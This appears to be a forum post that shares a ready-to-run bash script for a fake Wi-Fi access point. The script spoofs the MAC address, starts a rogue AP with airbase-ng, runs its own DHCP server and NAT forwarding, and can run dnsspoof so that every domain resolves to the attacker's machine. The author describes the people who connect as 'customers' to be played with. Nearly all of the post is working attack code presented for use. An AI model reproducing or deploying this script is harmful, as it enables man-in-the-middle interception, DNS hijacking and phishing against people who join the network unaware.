fake access point script

This is my version of a simple fake-ap script. It is either non-transparent or by choice transparent, if a working gateway is available.

It will do the following:
1. spoof mac-address
2. create a fake ap
3. run a dhcp-server
(4. if non-transparent: run a dnsspoofer)


By default the ap is transparent >> all connected clients have access to the internet.
If you want, you can set the ap to "non-transparent", which means that the dnsspoofer will cause all
attempts of trying to resolve a hostname will result in "10.0.0.1" >> the running machine itself.
With a webserver installed, the possibilities are endless. Maybe you set up a little web-chat and talk to your "customers" ;D


#!/bin/bash #Copyright 2010, deep_freeze <deep_freeze@mail.ru> killall dhcpd3 airbase-ng 2>/dev/null gateway=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` airmon-ng stop mon1 airmon-ng stop mon0 airmon-ng start wlan0 clear echo "##############################################" echo "[+] Spoofing Mac" echo "##############################################" mac=00:11:11:11:11:11 ifconfig wlan0 down ifconfig mon0 down macchanger -m $mac wlan0 macchanger -m $mac mon0 ifconfig wlan0 up ifconfig mon0 up modprobe tun echo "##############################################" echo "[+] Setting up AP" echo "##############################################" xterm -geometry 100x15+1+0 -T "FakeAP" -bg black -fg green -e airbase-ng -P -C 30 -e wlan mon0 -v& sleep 2 echo "##############################################" echo "[+] Setting up forwarding tables..." echo "##############################################" ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1800 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway iptables -P FORWARD ACCEPT iptables --append FORWARD --in-interface at0 -j ACCEPT iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE rm /etc/dhcp3/dhcpd.conf 2>/dev/null cat > /etc/dhcp3/dhcpd.conf << EOF default-lease-time 600; max-lease-time 7200; subnet 10.0.0.0 netmask 255.255.255.0 { option routers 10.0.0.1; option subnet-mask 255.255.255.0; option domain-name-servers 10.0.0.1; range 10.0.0.20 10.0.0.50; } EOF echo "[+] Setting up DHCP server..." xterm -geometry 100x15+0+230 -T "DHCP" -bg black -fg green -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0& while true do clear echo "####################AP########################" echo "transparent = 1 (default)" echo "non transparent = 2" echo "quit = 3" echo "##############################################" read mode case "$mode" in 1) iptables -t nat -D PREROUTING 2 kill $pid ;; 2) echo "10.0.0.1 *.* *" > /tmp/dns-spoof xterm -geometry 100x15+0+460 -T "dns-spoof" -bg black -fg green -e dnsspoof -i at0 -f /tmp/dns-spoof& pid=$! iptables -t nat -A PREROUTING -i at0 -j REDIRECT ;; 3) killall xterm exit 0 ;; esac done

http://www.aircrack-ng.org